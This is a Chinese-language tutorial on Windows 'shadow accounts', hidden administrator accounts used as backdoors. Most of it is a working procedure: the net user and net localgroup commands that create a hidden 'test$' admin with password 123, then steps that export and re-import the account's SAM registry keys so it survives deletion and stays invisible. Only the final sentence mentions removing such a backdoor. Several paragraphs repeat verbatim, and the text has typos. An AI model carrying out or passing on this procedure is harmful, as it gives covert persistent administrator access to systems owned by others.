概念定义:
影子账户,顾名思义,就是系统内我们看不到真正登录的账户信息,但是它却可以操作你电脑上所有的内容。 当我们的操作系统由于存在种种不安全漏洞、感染上了木马流氓软件,恶意插件、中毒或不正确的操作因密码被破解而被黑客入侵后,黑客为了方便自己下一次再次进入你的操作系统,他们通常会留下一个比较隐蔽的账户来保护自己的入侵,而正是因为这种账户用系统中提供的工具或方法都无法看到,并且无论是“控制面板的用户账户”、“计算机管理工具”,还是命令行,都无法删除此账户。
影子账户,顾名思义,就是系统内我们看不到真正登录的账户信息,但是它却可以操作你电脑上所有的内容。 当我们的操作系统由于存在种种不安全漏洞、感染上了木马流氓软件,恶意插件、中毒或不正确的操作因密码被破解而被黑客入侵后,黑客为了方便自己下一次再次进入你的操作系统,他们通常会留下一个比较隐蔽的账户来保护自己的入侵,而正是因为这种账户用系统中提供的工具或方法都无法看到,并且无论是“控制面板的用户账户”、“计算机管理工具”,还是命令行,都无法删除此账户。
一般来说,它是依附于系统内置的默认管理员账户——Administrafor而存在的,就好像是Administrator账户的影子一样,因此人们给它起了个形象的名字——影子账户。
操作方法:
先打开我的电脑——鼠标右键——管理——本地用户和组,建立新用户如test 密码123 或者使用命令行新建用户,如 net user test$ 123 /add (命令控制台隐藏用户的方法,在用户名名称后添加$ 如qq$)net localgroup administrator test$ /add
先打开我的电脑——鼠标右键——管理——本地用户和组,建立新用户如test 密码123 或者使用命令行新建用户,如 net user test$ 123 /add (命令控制台隐藏用户的方法,在用户名名称后添加$ 如qq$)net localgroup administrator test$ /add
打开注册表 开始——运行——regedit 进入注册表——开始——运行——regedit——local machine——SAM——SAM (此处要给管理员组授权,鼠标右键——权限——添加完全控制权限)
SAM——Domains——Account——Users——Names(对应的用户名test信息)-鼠标右键——导出用户名信息到电脑中,找到对应的类型0x3ec 文件夹
找到做影子账户的名称——鼠标右键——导出——用户名文件,在对应的注册表管理窗口右侧找到对应的权限值,同样导出权限文件
在前台计算机管理工具中,删除test用户,或者使用命令net user test$ /del
再次导入桌面用户的用户名和权限文件即可,双击即可导入。
再次导入桌面用户的用户名和权限文件即可,双击即可导入。
同样,当你的电脑被黑客远程控制以后,我们可以进入注册表,找到后门,删除对应的影子信息就可以摆脱控制了。
